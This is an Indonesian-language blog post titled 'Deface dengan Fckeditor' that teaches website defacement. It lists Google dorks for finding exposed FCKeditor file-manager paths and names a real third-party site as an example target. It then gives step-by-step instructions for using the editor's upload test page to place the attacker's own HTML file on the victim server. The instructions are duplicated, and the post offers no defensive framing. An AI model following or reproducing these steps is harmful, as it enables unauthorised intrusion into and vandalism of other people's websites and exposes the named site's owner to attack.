Dorknya:coba2 aja...
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/
Exploit: http://[target.com]/editor/editor/filemanager/upload/test.html
http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
dork diatas ^ isi kan d google, cari trget...klo dapat
ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/
inject kn exploit ny d atas....
jdinya.......
ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html
pada [Select the "File Uploader" to use: ] <----- pilih PHP
terus upload html kmu.....
klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload
ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html
maka hasil nya ada di http://[target.com]/editor/html_kamu.html
gampang kan mas brot..
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/
Exploit: http://[target.com]/editor/editor/filemanager/upload/test.html
http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
dork diatas ^ isi kan d google, cari trget...klo dapat
ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/
inject kn exploit ny d atas....
jdinya.......
ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html
pada [Select the "File Uploader" to use: ] <----- pilih PHP
terus upload html kmu.....
klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload
ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html
maka hasil nya ada di http://[target.com]/editor/html_kamu.html
gampang kan mas brot..
Tag :
Defacing
0 Komentar untuk "Deface dengan Fckeditor"